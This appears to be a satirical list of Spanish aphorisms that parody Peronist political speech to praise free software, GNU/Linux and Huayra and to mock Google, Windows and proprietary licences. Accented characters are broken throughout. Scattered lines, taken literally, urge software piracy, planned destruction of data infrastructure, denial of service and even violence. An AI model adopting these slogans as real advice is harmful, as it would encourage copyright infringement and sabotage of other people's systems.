Un material impreso con tinta estable en papel libre de �cido y resguardado en un armario seco y oscuro, permanecer� legible unos 200 a�os. Los bits carecen de material con calidad de archivo; ni siquiera hay certeza de poder leerlos a los 50 a�os.
Desde el punto de vista biol�gico natural, estamos sometidos a los t�rminos de una Evoluci�n - en la cual la naturaleza obra para mejorar al m�s apto para lograr su trascendencia a trav�s del tiempo. En el caso de nuestro kernel, obramos creativamente para hacerlo trascender en el tiempo bajo la ondeante bandera de la Libertad.
La Masa programa en Python. El Conductor en ensamblador.
El torront�s se comparte. El torrent tambi�n.
Huayra es un sistema operativo libre concebido para el plan de informatizaci�n educativa Conectar Igualdad. Fue desarrollado en Argentina por el Centro Nacional de Investigaci�n y Desarrollo de Tecnolog�as Libres (CENITAL), siguiendo los principios y libertades del software libre. Puede ser utilizado, estudiado, modificado y redistribuido.
La libertad de modificaci�n no es una limosna, es un Derecho que la comunidad se gana estudiando el c�digo.
La modificaci�n de usuario de un dispositivo que le pertenece para asegurar que permanezca funcional es una soluci�n perfectamente razonable y legal.
Tengo en mi escritorio todo lo necesario para la conducci�n del sistema. Esto es as� gracias a la licencia GNU que nos ha proporcionado un norte cardinal para nuestras acciones, y al Software Libre que lo ha sustentado.
Quien quiera aceleraci�n 3D, que programe; quien quiera bluetooth, que compile.
Los programas libres pueden mancomunarse junto a otros libres, y atresar una unidad indisoluble e infinita.
La libertad se defiende en el campo, en el taller, en la calle, en casa y en la CPU. No se puede aceptar que uno sea libre en su casa mientras que en el taller, en la f�brica, en la calle, y en la CPU su software es esclavo.
Deben seguir adelante con su organizaci�n y defender su software libre. La libertad individual es la base de la libertad colectiva, y esta construye el cimiento de la libertad del software.
El software privativo es un efecto de la injusticia social.
El software privativo eclosiona de sus s�ntomas: la esclavitud pol�tica y econ�mica, nacida como consecuencia de la quiebra de la unidad social.
Contra sofismas y dictaduras de quienes parad�jicamente se proclaman liberales y propugnan el software privativo, decimos la verdad.
El usuario novato poco puede hacer por el bien del sistema m�s que disfrutarlo.
Es el admin quien debe contar con gran expertise, y su tarea fundamental es la de entender el manejo del sistema y administrarlo para el bien del Pueblo.
Cuando la comunicaci�n pol�tica se facilita mediante mensajer�a electr�nica, los procesos de toma de decisiones pueden ser mucho m�s inclusivos y participativos.
En los sistemas tipo Unix podemos contar con una estructura de directorios, y los mismos pueden contener archivos. Estos normalmente son visibles y evidentes para los trabajadores.
Unix permite m�ltiples tareas y m�ltiples usuarios en sus sistemas de archivaje, tanto en disco duro como flexible.
Unix permite m�ltiples directorios y subdirectorios jer�rquicos.
Unix cuenta con Entrada/Salida compatibilizada, lo que permite a sus usuarios redireccionar sus entradas y salidas.
Unix cuenta con un vers�til programa int�rprete de comandos, que ofrece una interfaz de usuario flexible y reconfigurable.
Unix cuenta con un sistema de seguridad por contrase�a, que limita el acceso al sistema y sus archivos a la vez que proteje los ficheros con atributos de lectura, escritura, agregado y ejecuci�n.
Unix cuenta con soporte de fecha y hora.
Unix cuenta con numerosos buffers de ficheros, para ejecuci�n de alta velocidad.
Unix dispone de ejecuci�n de tareas y servicios de usuarios residente en memoria libre de intercambio, por medio de veloz conmutaci�n contextual de banco de memoria.
Entubar el uso de herramientas dis�miles es lo que torna a un sistema Unix poderoso. Esto es lo adecuado y tambi�n lo justo.
No utilizo software privativo alguno. �Prefiero morir de hambre antes que comer el amargo pan de la traici�n!
�Vengo conmovido por el eco resonante de una sola voluntad colectiva; la de que todo el software tenga GPLv3, para que de una vez por todas quede libre de la esclavizante EULA que lo agobia!
Hemos venido a terminar con una moral social que permit�a que los programadores tuviesen para compilar s�lo lo que se les diera por voluntad patronal y no por deber impuesto por la Licencia GNU.
�Que haya una sola clase de Software: el Libre!
Ojo con Window$: a un tonto solo hay que ponerle cerca una cuerda y se la atar� al cogote nom�s para ver c�mo le aprieta.
Despu�s del apt-get install vendr�n los paquetes que bueno me har�n.
Ahora aparecen las fuerzas centr�petas en la pol�tica: aquellas que impulsan a las masas hacia nuestro centro de atracci�n, conform�ndolo toda vez de manera m�s densa y acelerada. Estamos en el engorde de un Movimiento que - en la medida que compilemos m�s paquetes - se har� m�s y m�s fuerte.
Ante la parafernalia montada y la mentira, hemos de contestar golpe por golpe, en todo tiempo y en todo lugar. Nuestra batalla es contra una oligarqu�a ensoberbecida, dispuesta a vender el software al mejor postor, y capaz de hacerlo por sus �nfulas for�neas.
Si deseamos pelearnos entre nosotros, m�s vale que sea en un FPS corriendo en un servidor local. Los de afuera son de palo.
Si no quedan m�s medios, tal vez debemos imponer la acci�n violenta, mas este ha de ser el �ltimo de los recursos que debemos imponer. Mientras tanto debemos decompilar todo lo que se pueda.
MULTICS no archiva. Segmenta.
Los medios de almacenamiento de un sistema inform�tico equivalen lo que la vestimenta en un ser humano. No podemos pretender que �sta represente siempre la �ltima moda; cada tanto hemos de cambiarlos.
La sabidur�a es un valor intangible, pero acotado si no puede transmitirse. Es por ello que a lo largo de la historia, esto fue tarea primero de los didactas en la antig�edad griega, y luego de los escribas del medioevo, para finalmente recaer en los renacentistas de la imprenta en dicho per�odo. En la Era de la Informaci�n - que es por la que transitamos - esto ya es una tarea de todos.
Linux es subversivo.
El verdadero valor del c�digo lo da el compartirlo con una Comunidad, para que lo estudie, lo modifique, y le d� el vuelo de un ave migratoria, sin enjaularlo con una EULA.
Subvertir�s toda EULA copiando, prestando, rentando, decompilando, desensamblando, publicando, distribuyendo y creando obras derivadas (incluso ofreci�ndolas a la venta) de cualquier porci�n de toda obra de software privativo.
Subvertir�s toda EULA obteniendo, instalando y usando copias no autorizadas del software privativo.
Explotar�s la EULA de cualquier forma diferente a la que se encuentra en acordancia con la documentaci�n y uso concebido, sin autorizaci�n escrtita o expresa de tipo alguno.
Mantener en secreto la informaci�n es ineficiente; obliga a una antiest�tica duplicaci�n de esfuerzos.
La informaci�n anhela ser libre.
Nuestra Cultura es permeable a los cambios, y desde el Mart�n Fierro hasta el libro m�s risue�o, hemos de leerlo y compartirlo por Torrent.
Los Pueblos han de tener libre acceso a todas las fuentes y manifestaciones de la cultura y de la educaci�n, y esto incluye los contenidos digitales en las redes de datos.
La educaci�n hacker ha demostrado ser una expresi�n emergente de la pedagog�a cr�tica para nuestras sociedades digitalizadas, tanto en sus contextos originales, las comunidades hacker, como en proyectos y acciones que han surgido en todo el mundo inspirados en sus valores.
De un tiempo a esta parte, se han popularizado los e-Book -libros electr�nicos-, que no operan ya de forma f�sica sino que son documentos informatizados. Estos cuentan con la ventaja de su f�cil transmisi�n telem�tica, y su bajo costo.
Pocos sistemas se pueden hacer aislados: normalmente los Unix son un kernel y cien mil aplicaciones.
Hay una sola forma de resolver el problema de la agitaci�n de las masas, y ella es el verdadero software libre.
No queremos consentir que en la gran ciudad telem�tica que habitamos, los datos del programador experto, profesionalmente calificado, residan hacinados en un servidor ajeno inmundo porque su patr�n se niega a instalar una instancia libre de almacenamiento.
Nos quieren decir que lo nuevo es contar con aplicaciones de ejecuci�n remota, en la nube. Esta doctrina que se denomina "software como servicio" no es otra cosa que la zoncera de siempre, una enga�ifa para incautos.
S�lo el indio ve�a informaci�n en la nube.
El problema de llamar a GNU Linux no es un problema de todos. Es un problema entre Richard Stallman y Linus Torvalds. Que se arreglen entre ellos. Nosotros nos entendemos clarito.
Escribir c�digo es menos atractivo que quejarse y lamentarse de Stallman.
Yo ten�a un uutils/Linux que se llamaba Ubuntu, y yo lo llamaba... "�Ubuntu, Ubuntu!", y Ubuntu ven�a, pero yo sab�a que no era GNU/Linux, era un uutils/Linux. Lo mismo pasa con algunos que se llaman peronistas, y yo los llamo y vienen, pero yo s� que no son peronistas.
Yo ten�a un GNU que se llamaba Linux, y yo lo llamaba... "Linux, Linux", y Linux ven�a, pero yo sab�a que no era un Linux, era un GNU. Lo mismo pasa con algunos que se llaman peronistas y yo los llamo y vienen, pero yo s� que no son peronistas.
Estos se�ores que propugnan el uso de la "nube" s�lo tratan de convertirnos en meros inquilinos del software en equipo ajeno, con la intenci�n inconfesable que paguemos el alquiler con nuestros datos y las expensas con nuestra propia dignidad.
�Hackers! Todos han sufrido las consecuencias de quienes se presentan como amigos pero son mercaderes de nuestra privacidad y nuestro Capital, que es el trabajo.
La Columna Vertebral de nuestro Movimiento la conforman los hombres que programan. Ellos tienen la tarea de muscular y atresar nuestras organizaciones a fin de resistir cualquier embate que nos planteen.
La memoria de masa no vale por su n�mero, sino por la calidad de sus medios de almacenamiento.
Existen ocasiones donde lo importante es la interfaz y la velocidad. La interfaz, porque debemos replicar un flujo de trabajo existente en otras aplicaciones y no tenemos tiempo o ganas de seguir un trabajo nuevo. Y la velocidad, porque anhelamos una aplicaci�n moderna que d� lo m�ximo del hardware que tenemos.
El hardware podr�a considerarse importante, pero debemos darle la dimensi�n que realmente tiene: las de ser maleable herramienta para un trabajo de conjunto tendiente a la Liberaci�n de los hombres, que ha de ser superior.
Nuestro Movimiento ha de orientarse a las soluciones sencillas para el hombre de a pie, pues es �ste quien -con su coraz�n y mente puestos en el progreso- trabaja todos los d�as en pos de la Libertad.
La soluci�n musical original prevista en la computadora PC de IBM era mas bien poco imaginativa, ya que los oligarcas del Gigante Azul s�lo le hab�an previsto un altavoz interno adosado a un oscilador de onda cuadrada. A eso, esos miserables lo llamaban "el sonido del pueblo".
Desde las unidades de IBM que acompa�aban a las mainframe (de un tama�o individual que superaba a una heladera Siam), hasta el simp�tico Datasette del microordenador Commodore 64, la cinta ha sido protagonista del almacenamiento de Masa.
Para nosotros programar es adoctrinar, porque la doctrina es el �nico caudillo que resiste a la acci�n destructora del tiempo, y nosotros trabajamos para el porvenir.
Nuestro sistema es uno en donde hacer las acciones anheladas por los trabajadores es de lo m�s ameno. A ello he abocado todos mis esfuerzos de creador, artista y Conductor.
Algunos programadores pueden optar favorecer ciertas mejoras, toda vez que respetan la est�tica, credos y dem�s preconceptos de el c�digo heredado. En tal caso, nos encontraremos frente a un mero efectismo, que no suele suplir las necesidades nuevas con las caracter�sticas de ayer.
De todo hay en la Vi�a del Xe�or... est� BSD, est� Linux. Algunos dicen que si Balb�n se hubiese llamado Balb�n y yo me hubiese llamado Per�n, distinta habr�a sido la cosa...
Nuestra programaci�n ha de responder a las claves del sistema en que nos movemos, y ella no es infinita en el tiempo, sino que sufre invariablemente de excrecencias y modificaciones.
En nuestro tiempo compilar, es adoctrinar.
No hace falta una distribuci�n perfecta; se necesita una pr�ctica.
Cualquier programa dejado a la oligarqu�a crecer� hasta ocupar toda la memoria disponible.
A Window$ siempre es mejor borrarlo que emparcharlo.
Quien usa software privativo piensa que tiene algo y no tiene nada.
Nunca le ha servido a nadie el software de otro.
Los EULA son como los dioses del Antiguo Testamento, repletos de reglas y faltos de piedad.
En computaci�n no hay que emular experiencias. La experiencia es invalorable, pero tambi�n se encuentra situada en tiempo y espacio, y este es intransferible. Este insoslayable implic� aqu�l viejo apotegma que dice que la experiencia es un peine que la vida nos da cuando nos quedamos pelados.
Emular es meter la mula.
El emulador le mete la mula al software.
Debemos nutrirnos del software pasado de los Compa�eros que la vivieron para - en su reflejo - modificarlo y compilarlo para el futuro.
Las circunstancias de Unix no siempre responden a los mismos designios en el tiempo, y es por ello que un programador ha de saber adaptar lo nuevo si es que quiere replicar lo viejo.
Un Verdadero Programador ha de saber responder a las aut�nticas necesidades de su Pueblo.
Todo usuario ha de saber darse las herramientas para Unix por medio de la copia pero tambi�n por medio de la compilaci�n.
Ya hemos escrito el Kernel, y en condiciones mucho mas adversas, por lo cual las nuevas aplicaciones no revistar�n problema alguno.
Ahora todo estriba en avivar la llama de la resistencia aumentando el uso de GNU, mientras nos organizamos y planeamos la destrucci�n de la infraestructura de datos y la denegaci�n de los servicios privativos del enemigo.
Todo ello puede ser logrado si nos ponemos seriamente a hacerle la guerra sin cuartel, si trabajamos para tomar contacto con los que programan y los ayudamos desde aqu� con todo lo que podemos, especialmente ofreci�ndoles potencia de c�mputo y almacenaje en nuestros servidores.
Los datos y c�digo generado desde el Pueblo son para el Pueblo.
Googl? es una corporaci�n insaciable cuyo fin es capturar los datos de los Pueblos.
Al loguearte en el correo electr�nico de la megacorporaci�n Googl?, perfilar� tus b�squedas telem�ticas e intentar� inferir maquinalmente qui�n eres y cu�les son tus intereses.
Orientar nuestros dispositivos de lucha contra el imperialismo es hoy m�s sencillo que nunca: todos los tendidos conducen a Googl?.
Muchas cosas de las que haga Googl? nos favorecer�n, otras nos perjudicar�n, y la mayor parte no ser�n ni favorables ni desfavorables pero en adelante s�lo debemos confiar en lo que nosotros mismos seamos capaces de compilar para destruirlo.
En Googl? hayas lo que no buscas.
Dejar a Googl? la responsabilidad de organizar nuestra memoria colectiva y contentarse con sondearla es aceptar una forma de alienaci�n cultural. Instalar centros de datos es un imperativo de soberan�a nacional.
Nunca ha existido una forma de clientelismo m�s avasalladora que la que lleva a cabo Googl? en este mismo momento.
La forma m�s avasalladora de clientelismo es la que lleva a cabo Googl?.
Googl? ha dejado de ser un buscador para convertirse en un escudri�ador.
La cosa m�s alejada de Googl? ser�a una organizaci�n sin fines de lucro totalmente abierta.
La API de Googl? pretende alambrar un latifundio de los metadatos.
Edifica programas que por dise�o maten todos los procesos de Googl?.
No puedes confiar en el c�digo que no hayas creado enteramente por t� mismo.
Volver al BASIC nos recuerda las condiciones de anta�o, y las posibilidades que ten�amos entonces, mucho m�s acotadas sin duda gracias al avance de una t�cnica que hemos dominado.
El c�digo fuente se introduc�a directamente en la m�quina, y el esfuerzo requerido por ello hac�a imprescindible la participaci�n del Pueblo en la libre modificaci�n del c�digo, su libre copia - y sobre todo - la excelencia de distribuirlo libremente entre los compa�eros.
Ya no podemos darnos el lujo de admitir redes de datos formalmente inertes, pero que en la pr�ctica forman el modelo de expresi�n monop�lico y olig�rquico por antonomasia.
Las redes sociales basadas en empresas y sus viejos dirigentes, carecen ya del margen de maniobra necesario para nacer o reconstituirse en un medio de comunicaci�n democr�tico.
En las redes sociales basadas en empresas, el discurso suele descender al nivel de diatribas, de ataques personales, en lugar de un debate sustancial.
Frente al aniquilamiento de la neutralidad en la red, parecer�a no quedarle a nuestro Pueblo m�s opci�n que esperar una implosi�n sist�mica que permita barajar y dar de nuevo.
Detener las actualizaciones equivale a lo que nuestros baqueanos denominaban "desensillar hasta que aclare".
La historia no es frondosa en ejemplos de ca�da de sistemas GNU, y en el particular de los BSD, que - como la bicicleta - est�n preparados para operar en ese fino equilibrio previo a la ca�da.
Es dif�cil hacer caer a GNU. S�lo una imp�dica conducci�n har� que esta bicicleta - a cuyo manubrio tironean la RAM por un lado y el disco por otro - d� por el suelo.
La potencia de c�mputo avanzada s�lo se desplegar� con el multihilo simult�neo, el cual oficiar� de nivelador capaz de sustentar un pedaleo de acci�n pendular entre los n�cleos que componen su CPU.
Unix es un sistema operativo que permite que varias personas usen la misma computadora para realizar tareas diferentes, y �ste pretende ejecutarlas simult�neamente saltando r�pidamente de una tarea a otra.
Los sistemas operativos BSD no son clones, sino derivados de c�digo abierto del Unix de Investigaci�n de AT&T, a su vez ancestro del Unix System V.
Los tres proyectos BSD son bien conocidos por mantener el control de todo el c�digo fuente de todo el software de la distribuci�n. Est�n administrados de manera muy centralizada y se jactan de mantener todo el c�digo fuente junto en un �rbol de compilaci�n.
AT&T Unix no es c�digo abierto y, en sentido estricto del Derecho de autor, BSD no es Unix en absoluto.
No faltar�n quienes prefieran obtener licencias de uso de Unix en lugar de desarrollar sistemas operativos por s� mismos. A esos les damos GNU.
Muchos hackers han creado reimplementaciones m�s o menos exitosas del ideal de Unix, cada una con sus nuevos adornos. Algunos de ellas desaparecen r�pidamente, otras se fusionan con innovaciones similares y paralelas creadas por otros en un mutuo ataque al mismo problema.
Con frecuencia, las soluciones m�s innovadoras y espectaculares provienen de comprender que la concepci�n del problema planteado por las ciber-oligarqu�as era err�nea.
Unix se ha ido formulando lentamente alrededor de un n�cleo simple y ha adquirido una especie de complejidad y asimetr�a que le es org�nica, como las ra�ces de un �rbol o las ramificaciones de una arteria coronaria.
Compender el desarrollo de Unix es cosa m�s de la proctolog�a que de la ciencia del c�mputo.
Ninguna persona o empresa es due�a de BSD. Es creado y distribuido por una comunidad de colaboradores altamente cualificados y comprometidos a lo largo y ancho del mundo.
Un kernel no puede ser programado por imberbes y est�pidos. Para eso se necesitan hackers.
Para ser realmente �til, un software no debe ser un bien privado, sino que debe constituirse en un medio de car�cter social.
La acci�n ineludible de todo Justicialista ha de ser compartir todo su software. En la inform�tica, compartir el software es combatir al Capital.
La esencia del software es trascendental, pues puede ejecutarse en cualquier tiempo, y por tanto es imperecedera.
La Altair 8800 inspir� a muchos nerds peronistas al desarrollo, compartiendo masivamente software casero y libre, y a ciertos nerds gorilas en ocultar el c�digo fuente y someter binarios compilados al comercio.
En un inicio los equipos computacionales de electr�nica "a tubo" ten�an el tama�o y peso de una locomotora, pero con el pasar del tiempo el tama�o se fue reduciendo. Con el advenimiento de la transistorizaci�n, surgieron las primeras "minicomputadoras".
El transistor s�lo deja fluir una corriente el�ctrica a trav�s de su estructura cristalina con la fuerza permitida por la corriente de control aplicada al cristal.
Con el advenimiento de la microelectr�nica y los microprocesadores de silicio encapsulados como el Intel 4004 de 4 bits y su sucesor 8008 de 8 bits, se produjo otro salto cualitativo que permiti� proyectar calculadoras y cajas registradoras el�ctricas.
El manejo de las microcomputadoras pioneras resultaba incre�blemente tedioso, pues deb�an introducirse los operandos en binario por medio de ocho interruptores frontales, presionando un bot�n para almacenarlos en memoria y repetir la operaci�n con cada c�digo de ensamblado.
Cuando fueron dise�adas las primeras microcomputadoras, sus m�dulos de memoria conten�an por lo general cuatro mil bytes de almacenamiento.
El ciclo engendr� al lenguaje m�quina. El lenguaje m�quina dio vida al ensamblador. El ensamblador se la dio al compilador. Ahora hay diez mil lenguajes.
Existen hackers que son imprescindibles para llevar a buen t�rmino un software. Tales programadores facilitar�n nuestra labor en el mainframe, y sus apreciaciones permear�n en todo lo que hagamos. Tambi�n existen estos Torvalds que s�lo sirven para gastar aire.
La Liberaci�n del Software no es algo que pueda hacerse a medias, ni dejarse a la impericia de alguno: debe lograse por la mancomunidad de esfuerzos.
Programar requiere, en el fondo, emprender una lucha de aparatos. Esta raramente puede llevarse a cabo sin aplicar arm�nicamente las cuatro libertades del software.
Para poder programar para una comunidad libre es menester no aferrarse siempre a la propia voluntad, no hacerles hacer siempre a los dem�s lo que uno quiere, sino permitir que cada uno pueda modificar tambi�n una parte de lo que desea.
La Liberaci�n del Software requiere amplio control de sus cuatro libertades, as� como la movilizaci�n de masas politizadas e idealizadas - y el necesario convencimiento de las no politizadas - con el fin de modificar sus estructuras.
S�lo se podr� actuar efectivamente en defensa de los intereses de los hackers mediante software libre.
Obrando afiebradamente con software libre sobre los servidores de Internet, los hackers pueden al fin desenmascarar la olig�rquica visi�n de clase que la ha dominado.
Piratear software s�lo es garant�a de un triunfo pasajero que puede servirnos, pero tampoco podemos quedarnos como en el tango "pa'yudarte en lo que pueda cuando llegue la ocasi�n". �Hemos de escribir programas y compilarlos en este mismo momento!
Una de las cosas m�s dif�ciles de la tarea de compilar es encontrar a las bibliotecas con la capacidad para realizarla.
Contar con el �ltimo hardware es una bendici�n, pero tambi�n hemos de estar en condiciones de contemplar el uso de hardware m�s veterano, que podr�a ser de dificultoso o costoso recambio.
Podr�amos encontrarnos con la imposibilidad cierta de reemplazar el hardware viejo as� como as�... pero las m�s de las veces no querremos hacerlo por un humano sentido de cari�o dispensado hacia las m�quinas.
Como Conductor, puedo decirles que - siempre y cuando nuestras capacidades t�cnicas y ganas lo permitan - podemos continuar usando hardware del ayer. Uno ha de prever los naturales inconvenientes que hacer esto representa, pero en ocasiones lo veremos ampliamente justificado.
Uno de los inconvenientes intr�nsecos del hardware consiste en el de la obsolescencia de los medios de almacenamiento, ya sea por la dificultad de conseguirlos, o por el natural deterioro de sus partes m�viles.
Es necesario conocer la historia para llegar a un buen puerto en cualquiera de los quehaceres que podamos emprender, y en el caso de los sistemas computados, esta tambi�n ser� la pr�ctica a seguir como base para apreciar.
Unix es minimalista, pero proyectado a la grandeza. Solamente un sistema de esta caracter�stica corresponde una comunidad como la de los hackers unidos. Los timoratos, los pobres de esp�ritu y los mediocres prefieren siempre los peque�os proyectos como Window$.
Las comunidades organizadas como la nuestra, con grandes aspiraciones e ilusiones, deben tener tambi�n grandes sistemas operativos. GNU es uno de ellos: nada grande puede hacerse proyectando peque�eces.
Los hackers unidos, triunfaremos.
La finalidad primordial de GNU es esencialmente social: colocar un similar a Unix comunitario en forma que, dejando de ser privilegio de pocos, sea patrimonio de todos.
Como consecuencia de la modificaci�n del c�digo y la distribuci�n de copias modificadas, se elevar� de manera irremediable el nivel de conocimiento de los hackers, y se dotar� a toda la comunidad de un software m�s potente y mas digno.
Hemos hablado de programadores y hemos hablado de comunidad, porque tenemos la aspiraci�n de transformar estos programadores "mutum ed unans pecus", como dec�an los romanos, en una organizaci�n con una conciencia social y una personalidad social.
El instrumento para realizar la Revoluci�n del Software Libre son las Comunidades de Hackers Organizadas y encuadradas perfectamente, y la herramienta que puede comunicarnos es GNU.
La compilaci�n que ha de llevar a cabo la CPU no nace de un repollo: es consecuencia de la formaci�n que el programador posea, nutrida en su conciencia libre, y - no lo dudemos - del �leo sagrado de Samuel con que haya sido ungido al nacer.
La libertad del software se lleva en el coraz�n del programador. Las ideas volcadas en lenguaje de programaci�n se tienen en la mente del individuo. Finalmente, el proceso de compilaci�n tiene lugar en la CPU del mainframe. Todo esto conforma la uni�n del hombre y la m�quina.
Un hacker es un individuo que ha reprogramado colectivamente su conciencia para trascender su individualidad.
El hacker organizado hace uso del c�digo fuente de quienes -pudiendo ser sus pares- se convierten en instrumento y fin de tal comunidad organizada.
Sobre todas las cosas, la programaci�n ha de ser una tarea de s�ntesis.
El cl�ster de c�mputo ha sido llamado Masa, pues puede representarse como la suma de las conciencias de los hackers unidas a la conjunci�n de la potencia de c�mputo de los n�cleos de la CPU, confluyendo todas en una acci�n dirigida.
En programaci�n, la organizaci�n vence al tiempo.
En ITS buscaban la felicidad de todos, sin un Conductor. As� les fue.
Nadie duda ya que Blender es una herramienta completamente libre capaz de hacerle sombra al la m�s pintada suite de desarrollo de efectos tridimensionales.
LibreOffice nos hace comprender la obesidad m�rbida que tiene el paquete Micro$oft Offic?.
Qui�n ser�a tan tonto de pagar mensualmente el alquiler de Adob? Photo$hop, cuando poseer GIMP es totalmente gratis.
Ha llegado la Hora del Software Libre.
El sistema que yo encontr� era un hardware econ�micamente prisionero, manejado desde dentro y desde fuera por las fuerzas poderosas del dinero, que es la m�s inhumana de las tiran�as. �Esto ha sido corregido instalando GNU con Linux!
Lo bueno siempre quiere mejorarse, y a las buenas ideas siempre suelen tomarlas los zonzos. Estos son los que quieren dotar a una buena aplicaci�n Unix con chirimbolos, para hacer lo que uno no necesita.
Diremos que esta uni�n entre el Hacker y GNU, es la que hace a la Libertad bien entendida. Asemeja a la del hardware y el software. Para que el c�mputo sea libre, antes que el hardware ha de ser libre el software.
En ocasiones la inspiraci�n para programar ha de encontrarse en otros aspectos de la naturaleza, o del mundo.
Un buen pa�s es como un buen sistema operativo GNU con Linux: es aqu�l que puede mantenerse con un m�nimo de requerimientos por parte del Conductor.
Este mainframe nos permite - a�n a miles de kil�metros - digitar su destino. Quienes verdaderamente entienden sus vericuetos, aprecian sus secretos, y apelan a la creatividad para extraer lo mejor de s� son los hackers y hackeresas del Pueblo.
Una ignota camarilla no ha hecho m�s que usurpar el sentido del software, pero no podr�n ellos conducir a los Hackers, simplemente podr�n direccionar en ciertos casos alguno de los factores productivos.
Estos insensatos intentan enfrentar a nuestro Movimiento. Pero mientras ellos tienen el volante y la traba del capot, nosotros tenemos el acelerador, el freno, el embrague y la palanca de cambios. Pudiendo compilar mantenemos el control.
Si oteamos el panorama del c�mputo, veremos perfectamente como el dominio de las masas populares - en las que los programadores constituyen el pilar - han ido produciendo la desaparici�n de aquellas aplicaciones que �nicamente operaban a 16 bits. Siguieron el camino de los dinosaurios.
Los grandes lenguajes de programaci�n visuales que antes concentraban cientos de miles de usuarios, en los �ltimos tiempos apenas llegan a reunir cifras muy inferiores. Las masas de programadores saben perfectamente bien cual es la situaci�n dentro del sistema, y no necesitan ir a buscar inspiraci�n fuera de �l.
Hubo algunos que pensaron que la Argentina dispondr�a de un sistema operativo libre digitado desde el Estado "el d�a que las vacas vuelen"... Por suerte hoy con Huayra GNU/Linux, las vacas sacaron su brevet.
Desde el punto de vista de un mercado viciado por el derroche y el consumismo, se consider� que las netbooks (sobrecargadas y sobreesforzadas gracias al obsoleto Micro$oft Window$ XP) carec�an desde el vamos de la potencia necesaria. No comprendieron que con SSD y 4 Gigas, un Huayra vuela como un Pulqui II, y compila como un campe�n.
Uno de los secretos de la Oligarqu�a es esconder los �xitos ajenos. Por ello poco se ha hablado de la versi�n m�s nueva de Huayra en la arquitectura superior. Hablamos de la potente versi�n de 64 bits, industrializada para correr en equipos con procesadores multin�cleo, aquellos con ingentes cantidades de memoria RAM.
Por defecto, Huayra cuenta con un escritorio doble (dividido en "pantalla izquierda" y "pantalla derecha", como las alas del Justicialismo). Esto se indica en un �cono del panel superior, y se puede conmutar entre uno y otro con la combinaci�n Ctrl+Alt+Flecha Izquierda o Flecha Derecha.
Los cimientos del Software Libre est�n sin dudas en la Escuela. Es all� donde forma moralmente y se da los primeros pasos, y ser� imprescindible cultivar su uso en todos los �mbitos que se necesiten para lograr un futuro de grandeza.
Nadie tiene la fuerza movilizada que tiene el Software Libre, y en el futuro es previsible que esta capacidad se multiplique
En las sociedades modernas, la conectividad a Internet es una herramienta imprescindible para la soberan�a popular.
Como el agua potable y los servicios el�ctricos, la conexi�n a las redes de datos ha de ser considerada tambi�n un Servicio P�blico.
La Comunicaci�n inform�tica, al ser una necesidad humana, ha de entenderse tambi�n como un Derecho.
Todo medio de comunicaci�n masivo y horizontal ha de ser comprendido como un fuerte integrador comunitario y un multiplicador de la voluntad pol�tica de los Pueblos.
Una pol�tica de conectividad sabiamente formulada y ejecutada, tender� de manera poderosa a la Justicia Social y a la multiplicidad de voces.
Para un hacker no hay nada mejor que una hackeresa.
Al igual que la masa, el hardware raras veces es homog�neo.
Ubuntu consiste en una derivaci�n de la distribuci�n Debian, pensada con Humanidad, entendiendo la acci�n de Justicia Social que significa compartir el software. Est� orientada a los primeros compa�eros que toman contacto con un sistema GNU con kernel Linux, y como tal comparte las facilidades de un entorno olig�rquico pero afianzando la Libertad.
Las mal llamadas "Redes Sociales" son, en realidad, sistemas de c�mputo empresarial destinados al despilfarro social masivo. Orientan al incauto al gasto, porque el gasto produce lucro.
El ser humano - cegado por el espejismo de la tecnolog�a - ha olvidado las verdades que est�n en la base de su existencia.
La separaci�n tecnol�gica dentro de la humanidad se est� agudizando de modo tan visible que perece que estuviera constituida por m�s de una especie.
Mientras el hombre llega a la luna gracias a la cibern�tica, la nueva metalurgia, combustibles poderosos, la electr�nica y una serie de conocimientos te�ricos fabulosos, el hombre mata el ox�geno que respira, el agua que bebe, al suelo que le da de comer, eleva la temperatura permanente del medio ambiente sin medir sus consecuencias biol�gicas, y encadena a su software mediante el uso de licencias privativas.
La modificaci�n de las estructuras sociales y productivas en el mundo implica que el lucro y el despilfarro no pueden seguir siendo el motor b�sico de sociedad alguna, y mucho menos de las redes de datos.
Es natural que se exija la Justicia Social como base de las licencias de software utilizadas en todo sistema operativo.
Cualquiera sean los bugs que se encuentren, todos ellos est�n ligados de manera indisoluble con la falta de justicia social, soberan�a pol�tica e independencia econ�mica del Tercer Mundo.
Toda aplicaci�n de Software Libre, en cualquier campo que se quiera, no ser� menos que beneficiosa.
Los entornos similares a Unix est�n concebidos bajo el paradigma Justicialista de la compartici�n de tiempo y recursos computacionales, y los GNU con kernel Linux confluyeron tal premisa en las PC compatibles con IBM.
La imaginaci�n de un ni�o puede hacer cosas maravillosas, pero a veces el software libre puede hacer cosas m�s maravillosas a�n.
Un hacker ha de programar la CPU en pos de un objetivo que no puede ser otro que ofrecer un destino de grandeza a la Comunidad en la que habita.
En el comienzo... estaba la L�nea de Comandos.
La Interfaz de L�nea de Comandos permite operar mecanografiando las �rdenes que necesitemos para su ejecuci�n, tanto local como remota.
Favorezco el uso de la l�nea de comandos siempre que sea posible, en cuenta de que la misma permite la agilidad que todo hacker requiere para el Movimiento.
Aunque una Interfaz Gr�fica de Usuario (GUI) puede simplificar dram�ticamente el uso de una computadora, en muchos contextos la manera m�s poderosa y flexible para interactuar con una computadora es a trav�s de la Interfaz de L�nea de Comandos (CLI).
No cejamos en decir que en nuestro server, los �nicos Privilegiados son los hackers.
Los hackers son aquellos que con sus compilaciones de software dan vida a una nueva iteraci�n del Sistema.
Cada versi�n de nuestro software lo har� m�s y m�s fuerte, hasta convertirlo en una fuerza que a la que la Oligarqu�a jam�s podr� conmover ni enga�ar.
Las hackeresas han recibido el mensaje claro que tiene el c�digo libre, y en sus tiernas CPUs han comprendido que son ellas las aut�nticas herederas de todo lo que hacemos.
Durante a�os nuestros hackers y su software han sido sometidos, encadenados por la opresi�n de la oligarqu�a y su software privativo, pero hoy, gracias a nuestra Doctrina, todos pueden hacer lo que quieran con su programaci�n sin deberle nada a nadie!
Desde sus pretendidas tarimas de Poder los oligarcas dicen quejarse por el rumbo que toma el Software Libre. �Dicen no saber a donde nos llevar� esta este Movimiento! El problema no es a donde nos lleva. �Cualquier cosa es buena si salimos de donde ven�amos!
Alguien que programa en un sistema de usuario �nico no es un programador, es un tipo solo. Ha de utilizar un sistema de c�mputo de tiempo compartido, pues hacker acompa�ado compila para la historia.
